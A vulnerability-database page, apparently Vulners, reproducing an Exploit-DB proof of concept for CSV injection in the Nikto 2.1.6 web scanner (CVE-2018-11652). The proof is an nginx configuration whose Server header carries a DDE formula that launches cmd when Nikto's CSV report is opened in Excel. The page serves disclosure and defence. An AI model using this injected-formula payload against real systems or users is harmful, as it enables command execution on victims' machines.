Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Nikto 2.1.6 - CSV Injection

🗓️ 18 Jun 2018 00:00:00Reported by Adam GreenhillType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 322 Views

Nikto 2.1.6 CSV Injection vulnerability allows remote attackers to inject OS commands via HTTP response header, directly into a CSV report

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Nikto 2.1.6 - CSV Injection Vulnerability
18 Jun 201800:00
zdt
AlpineLinux		CVE-2018-11652
1 Jun 201815:00
alpinelinux
CNVD		Nikto CSV Injection Vulnerability (CNVD-2018-16264)
28 Jun 201800:00
cnvd
Check Point Advisories		Nikto CSV Injection Remote Code Execution (CVE-2018-11652)
20 Jun 201800:00
checkpoint_advisories
CVE		CVE-2018-11652
1 Jun 201815:00
cve
Cvelist		CVE-2018-11652
1 Jun 201815:00
cvelist
Debian CVE		CVE-2018-11652
1 Jun 201815:00
debiancve
exploitpack		Nikto 2.1.6 - CSV Injection
18 Jun 201800:00
exploitpack
Fedora		[SECURITY] Fedora 28 Update: nikto-2.1.6-1.fc28
20 Jun 201801:55
fedora
Fedora		[SECURITY] Fedora 27 Update: nikto-2.1.6-1.fc27
19 Jun 201815:11
fedora
Rows per page
# Exploit Title: Nikto 2.1.6 - CSV Injection
# Google Dork: N/A
# Date: 2018-06-01	
# Exploit Author: Adam Greenhill
# Vendor Homepage: https://cirt.net/Nikto2
# Software Link: https://github.com/sullo/nikto
# Affected Version: 2.1.6, 2.1.5
# Category: Applications
# Tested on: Kali Linux 4.14 x64
# CVE : CVE-2018-11652
 
# Technical Description:
#  CSV Injection vulnerability in Nikto 2.1.6 and earlier allows remote attackers 
# to inject arbitrary OS commands via the Server field in an HTTP response header, 
# which is directly injected into a CSV report.
 
# PoC
# Install nginx and nginx-extras: apt-get install -y nginx nginx-extras
# Configure the nginx server as follows by editing the /etc/nginx/nginx.conf file:

user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
    worker_connections 768;
    # multi_accept on;
}

http {
    server_tokens off; # removed pound sign
    more_set_headers "Server: =cmd|' /C calc'!'A1'";

    server {
        listen 80;

        server_name localhost;

        location /hello {
            return 200 "hello world";
        }
    }
}

# Restart the server: service nginx restart
# Scan the nginx server with Nikto configured to output the results to a CSV file:

nikto -h <nginx address>:80 -o vuln.csv

# Open the resulting CSV file in Microsoft Excel and observe that CMD is attempting 
# to execute

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Jun 2018 00:00Current
9.5High risk
Vulners AI Score9.5
CVSS 39.8
CVSS 210
EPSS0.33586
nikto 2.1.6csv injectionremote attackersos commandshttp response headercsv reportvulnerability
322